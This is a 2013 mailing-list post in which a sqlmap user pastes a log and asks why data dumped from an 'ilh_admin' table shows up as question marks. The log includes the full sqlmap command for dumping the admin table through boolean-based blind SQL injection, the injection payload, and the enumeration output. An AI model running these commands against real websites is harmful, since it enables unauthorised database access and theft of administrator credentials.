[sqlmap-users] Data retrieval problem - Question Marks
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] Data retrieval problem - Question Marks
|
From: Vinicius Da L. <vin...@gm...> - 2013-07-16 16:29:27
|
log:
imac:sqlmap $ ./sqlmap.py -u "http://target/?ref=foobar" --technique=B
--threads=10 --no-cast -T ilh_admin --dump
sqlmap/1.0-dev-a639dbb - automatic SQL injection and database takeover
tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program
[*] starting at 13:22:41
[13:22:41] [INFO] resuming back-end DBMS 'mysql'
[13:22:41] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: ref
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ref=Manuellaerick' AND 8207=8207 AND 'GPWS'='GPWS
---
[13:22:41] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5
[13:22:41] [WARNING] missing database parameter. sqlmap is going to use the
current database to enumerate table(s) entries
[13:22:41] [INFO] fetching current database
[13:22:41] [INFO] retrieving the length of query output
[13:22:41] [INFO] resumed: 22
[sniped]
[13:22:44] [INFO] retrieving the length of query output
[13:22:44] [INFO] retrieved: 13
[13:22:54] [INFO] retrieved: ?????????????
[13:22:54] [INFO] retrieving the length of query output
[13:22:54] [INFO] retrieved: 1
[13:22:58] [INFO] retrieved: _
[13:23:00] [WARNING] in case of continuous data retrieval problems you are
advised to try a switch '--no-cast' or switch '--hex'
[13:23:00] [INFO] retrieving the length of query output
[13:23:00] [INFO] retrieved: 10
[13:23:09] [INFO] retrieved: ??????????
[13:23:09] [INFO] analyzing table dump for possible password hashes
Database: hostl347
Table: ilh_admin
[1 entry]
+----+------------+---------------+
| id | pass | admin |
+----+------------+---------------+
| | ?????????? | ????????????? |
+----+------------+---------------+
|
